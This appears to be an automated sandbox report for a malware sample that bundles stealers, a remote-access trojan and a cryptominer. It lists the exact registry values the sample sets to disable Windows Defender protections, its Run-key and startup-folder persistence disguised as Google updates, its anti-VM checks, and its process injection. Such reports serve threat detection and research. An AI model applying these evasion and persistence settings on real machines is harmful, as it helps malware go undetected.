Analysis Overview
SHA256
f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
Threat Level: Known bad
The file f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e was found to be: Known bad.
Malicious Activity Summary
Systembc family
Modifies Windows Defender notification settings
Amadey
Litehttp family
Modifies Windows Defender TamperProtection settings
Detect Xworm Payload
Modifies Windows Defender DisableAntiSpyware settings
Vidar
Xworm family
Modifies Windows Defender Real-time Protection settings
Vidar family
Xmrig family
SystemBC
Xworm
Detects Healer an antivirus disabler dropper
Healer
LiteHTTP
Amadey family
Detect Vidar Stealer
xmrig
Healer family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Downloads MZ/PE file
Boot or Logon Autostart Execution: Active Setup
Blocklisted process makes network request
Uses browser remote debugging
Command and Scripting Interpreter: PowerShell
Drops startup file
Windows security modification
Checks computer location settings
Identifies Wine through registry keys
Loads dropped DLL
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Reads data files stored by FTP clients
.NET Reactor proctector
Executes dropped EXE
Enumerates connected drives
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Browser Information Discovery
Program crash
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious use of UnmapMainImage
Suspicious use of SetWindowsHookEx
Modifies registry class
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 22:58
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 22:58
Reported
2025-03-05 23:00
Platform
win7-20240903-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\2b862aa467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\2b862aa467.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8a07a872cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\8a07a872cb.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\3bb952ccb1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107740101\\3bb952ccb1.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\QanWmXjd\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2d999341a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\a2d999341a.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 852 set thread context of 2752 | N/A | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe |
| PID 1548 set thread context of 1748 | N/A | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe |
| PID 1440 set thread context of 2408 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe |
| PID 2636 set thread context of 1056 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 1796 set thread context of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\kplnh\nvwjc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
